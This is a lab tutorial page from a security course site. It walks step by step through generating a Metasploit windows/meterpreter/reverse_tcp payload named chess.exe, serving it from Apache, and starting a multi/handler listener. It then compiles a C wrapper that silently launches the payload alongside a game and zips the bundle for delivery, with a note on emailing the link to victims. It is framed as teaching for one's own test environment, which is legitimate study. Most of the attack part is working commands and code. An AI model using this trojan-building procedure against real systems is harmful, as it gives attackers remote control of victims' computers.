ComputerSecurityStudent (CSS) [Login] [Join Now]

|SECURITY TOOLS >> Trojan Horse Creation >> Current Page |Views: 43274

(Trojan Horse 2: Lesson 1)

{ How to create and bundle the metasploit msfpayload reverse_tcp }

Section 0. Background Information
  • Pre-Requisite Lab


  • Overview
    • This lab is very similar to Trojan Horse Lesson 1.
    • The big difference is that we use a Metasploit Payload to send a request back to the BackTrack server running a Metasploit listener.


  • Caveats
    • Your BackTrack server either (1) needs to be on the same subnet as the victim host OR (2) it should have a public internet address with port 4444 opened up on your firewall/router that points to your BackTrack server.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
Section 1. Start Up BackTrack5R1
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine


  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.


  3. Bring up the GNOME
    • Instructions:
      1. Type startx


  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window


Section 2. Create msfpayload windows/meterpreter/reverse_tcp
  1. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • My IP address In your case, it will probably be different.
      • You will later use this IP Address when you SFTP the Trojan Horse from your Windows Client to this BackTrack Machine.


  2. Create the msfpayload
    • Instructions:
      1. msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 x > /var/www/html/games/chess.exe
    • Notes:
      • windows/meterpreter/reverse_tcp is the msfpayload
      • LHOST specifies the BackTrack Server that the TCP traffic will be sent to.
      • LPORT specifies the port number of the IP address that the TCP traffic will be sent to.


  3. Verify payload was created
    • Instructions:
      1. ls -l /var/www/html/games/chess.exe


  4. Start the Apache Webserver
    • Instructions:
      1. cd /etc/init.d
      2. ./apache2 start


  5. Start Up Metasploit msfconsole
    • Instructions:
      1. Applications --> msfconsole --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
    • Note:
      • Metasploit takes about 5 to 20 seconds to start up


  6. Start Exploit listener
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST
      4. set LPORT 4444
      5. exploit
      6. Continue to the next section!!!


Section 3. Start Up Windows Machine
  1. Booting up WindowsVulerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulerable01
      3. Play Virtual Machine
    • Note:
      • For those of you that are not part of my class, WindowsVulernable01 is a Windows XP Machine.
      • Any version of Windows can be used.
      • Please complete the compiler prerequisite in Section 0.


  2. WindowsVulerable01 Authentication
    • Instructions:
      1. Login as administrator


Section 2. Start up Internet Explorer
  1. Start Up Internet Explorer.
    • Instructions:
      1. On WindowsVulnerable01
      2. Bring Up Internet Explorer
      3. Start --> All Programs --> Internet Explorer


  2. Download the msfpayload you just created
    • Instructions:
      1. Place
        • In my case, is my BackTrack IP Address.
        • In your case, use the IP address obtain in Section 2, Step 1.
      2. Click on chess.exe
      3. Click on the Save button


  3. Save the msfpayload you just created
    • Instructions:
      1. Navigate to C:\tools\snowcraft2\dir
        • Note: If these directories do not exist, please create them.
      2. Name the file "chess.exe"
      3. Click the Save button


  4. Download Complete
    • Instructions:
      1. Click Close


Section 4. Download Snowcraft
  1. Download snowcraft.exe
    • Instructions:
      1. Use your WindowsVulnerable01's Internet Explorer
      2. Click Here To Download Snowcraft.exe
    • Note:
      • Snowcraft is not a virus, it will just serve as a Trojan Horse.  This is a great game that I play every year during Christmas time.


  2. Save snowcraft.exe
    • Instructions:
      1. Navigate to C:\tools\snowcraft2\dir
      2. Name the file snowcraft.exe
      3. Click the Save Button


  3. Download Complete
    • Instructions:
      1. Click Open Folder


  4. Verify your work
    • Instructions:
      1. In C:\tools\snowcraft2\dir
      2. You should have snowcraft.exe and chess.exe (a/k/a, msfpayload)


Section 5. Start up the CodeBlocks IDE
  1. Start up your CodeBlocks IDE
    • Instructions:
      1. Start --> All Programs --> CodeBlocks --> CodeBlocks


  2. Create an Empty File
    • Instructions
      1. File --> New --> Empty file


  3. Save Empty File
    • Instructions:
      1. File --> Save file as...


  4. Save file
    • Instructions:
      1. Navigate to C:\tools\snowcraft2
      2. Name the file "snowcraft2.cpp"
      3. Save as type: C/C++ files
      4. Click Save


  5. Cut and Paste Code into the CodeBlocks IDE
    • Instructions:
      1. Highlight the below code
      2. Right Click --> Copy
      3. Paste into the CodeBlock Window (See Below)
    • Code:
      • #include <stdio.h>
        #include <stdlib.h>

        int main ()
            system("start /B dir\\chess.exe");

            //return 0;
    • Note:
      • start /B means start up the chess.exe program without creating a separate window.


  6. Save snowcraft2
    • Instructions:
      1. File --> Save File


  7. Compile current file
    • Instructions:
      1. Build --> Compile Current file
    • Note:
      • In the Build log tab, you will see a Build log message.
      • If there are no errors, you will see a message similar to below, saying you have 0 errors.
      • If you received even one error, then you cannot continue to the next step.


  8. Build and run
    • Instructions:
      1. Build --> Build and run


  9. Build and View Results
    • Instructions:
      1. You should see that Snowcraft was kicked off
      2. Play the game if you want.
      3. When you get bored continue to the next step.


  10. View Connection Request Sent to Backtrack
    • Note:
      1. Go over to your BackTrack Machine
      2. You should see connection established between BackTrack ( and the Windows Machine (
      3. Your IP Address will be different.


  11. Bring up task manager
    • Instructions:
      1. Go Back over to Your Window Machine
      2. Right click on bottom task bar
      3. Select Task Manager


  12. View Task Manager Processes
    • Note:
      1. Notice that chess.exe (a/k/a msfpayload) is running
      2. Also the Trojan Horse Game, snowcraft.exe is running.


  13. Open a Command Prompt
    • Instruction:
      1. Start --> All Programs --> Accessories --> Command Prompt


  14. Let's investigate chess.exe process
    • Instruction:
      1. tasklist | findstr chess
        • tasklist is the command line equivalent to Windows Task Monitor.
        • findstr is like the unix grep command, where we are searching for chess.
        • NOTE: In my case, the PID that was returned was 3808.  In your case, it will be different.
      2. netstat -nao | findstr 3808
        • netstat is being used to show all network connections.
        • Then findstr search for the chess.exe PID of 3808.
        • NOTE: There is a TCP port listening on 4444.
      3. date, press enter twice
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • E.g., echo "John Gray"
    • Proof of Lab (Part 1)
      1. Do a PrtScn
      2. Paste into a word document.


Section 6. Bundle Instructions
  1. Close out the following applications
    • Instructions:
      1. Close the CodeBlocks IDE
      2. Close SnowCraft
      3. Close the Command Prompt


  2. Close out the following applications
    • Instructions:
      1. Start --> My Computer
      2. Navigate to C:\tools\snowcraft2
      3. Delete snowcraft2.cpp
      4. Delete snowcraft2.o


  3. Zip up the snowcraft2
    • Instructions:
      1. Navigate to C:\tools\snowcraft2
      2. Hold down the Ctrl Key and Left Click on both dir and snowcraft2.exe.
      3. Once Highlighted, Right Click
      4. Send To --> Compressed (zipped) folder


  4. Congratulations
    • Note:
      1. In C:\tools\snowcraft2, you should see a new file called
      2. A malicious person might place this zipped file on their website, and send an email with a web link to the victim.
      3. Once the victim clicks on the link, a request is sent to the BackTrack server and if the BackTrack server is listening, then the Windows Server has just become a victim.
      4. Pretty Scary Stuff!!!


Section: Proof of Lab
  1. Open a Command Prompt
    • Instruction:
      1. Start --> All Programs --> Accessories --> Command Prompt


  2. Verify your handy work
    • Instruction:
      1. cd "C:\tools\snowcraft2"
      2. dir
      3. date, press <Enter> twice
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • E.g., echo "John Gray"
    • Proof of Lab:
      1. Do a PrtScn
      2. Paste into the previously created word document
      3. Upload to Moodle.


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth